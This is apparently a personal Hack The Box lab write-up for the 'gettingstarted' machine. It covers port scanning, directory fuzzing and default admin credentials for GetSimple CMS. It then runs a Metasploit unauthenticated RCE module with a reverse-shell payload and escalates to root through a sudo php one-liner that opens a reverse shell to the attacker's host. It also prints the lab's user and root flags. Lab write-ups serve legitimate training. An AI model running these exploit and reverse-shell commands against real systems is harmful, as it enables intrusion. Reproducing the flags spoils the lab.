~a14m/HTB

HTB/gettingstarted.htb/README.md -rw-r--r-- 4.1 KiB
e8df2d85a14m Add the network analysis cheatsheet a day ago

#Analysis

#Ports

nmap -sC -sV 10.129.168.121

Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 18:55 CEST
Nmap scan report for 10.129.168.121
Host is up (0.043s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA)
|   256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA)
|_  256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Welcome to GetSimple! - gettingstarted
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds

#Ports: (80/tcp) GetSimple CMS

#Directory fuzzing

gobuster dir --url 10.129.168.121 --wordlist /usr/share/SecLists/Discovery/Web-Content/common.txt

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.168.121
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/06/27 19:00:48 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/admin                (Status: 301) [Size: 316] [--> http://10.129.168.121/admin/]
/backups              (Status: 301) [Size: 318] [--> http://10.129.168.121/backups/]
/data                 (Status: 301) [Size: 315] [--> http://10.129.168.121/data/]
/index.php            (Status: 200) [Size: 5485]
/plugins              (Status: 301) [Size: 318] [--> http://10.129.168.121/plugins/]
/robots.txt           (Status: 200) [Size: 32]
/server-status        (Status: 403) [Size: 279]
/sitemap.xml          (Status: 200) [Size: 431]
/theme                (Status: 301) [Size: 316] [--> http://10.129.168.121/theme/]

===============================================================
2021/06/27 19:01:05 Finished
===============================================================

#GetSimple Version: 3.3.15

#Credentials
username password note
admin admin http://10.129.168.121/admin

#Metasploit

> search getsimple

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/unix/webapp/get_simple_cms_upload_exec    2014-01-04       excellent  Yes    GetSimpleCMS PHP File Upload Vulnerability
   1  exploit/multi/http/getsimplecms_unauth_code_exec  2019-04-28       excellent  Yes    GetSimpleCMS Unauthenticated RCE


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/getsimplecms_unauth_code_exec

#Exploit

> use 1
> set rhosts 10.129.168.121 
> set lhost tun0
> set payload generic/shell_reverse_tcp
> run
whoami
www-data

> python3 -c 'import pty; pty.spawn("/bin/sh")'
$ cd /home/mrb3n
$ cat user.txt
> 7002d65b149b0a4d19132a66feed21d8

#Privilage escalation

[box]$ nc -lnvp 9001

[target]$ sudo -l
User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php
[target]$ sudo php -r '$sock=fsockopen("10.10.15.130",9001);passthru("/bin/sh -i <&3 >&3 2>&3");'
[box]$ whoami
> root
[box]$ cat /root/root.txt
> f1fba6e9f71efb2630e6e34da6387842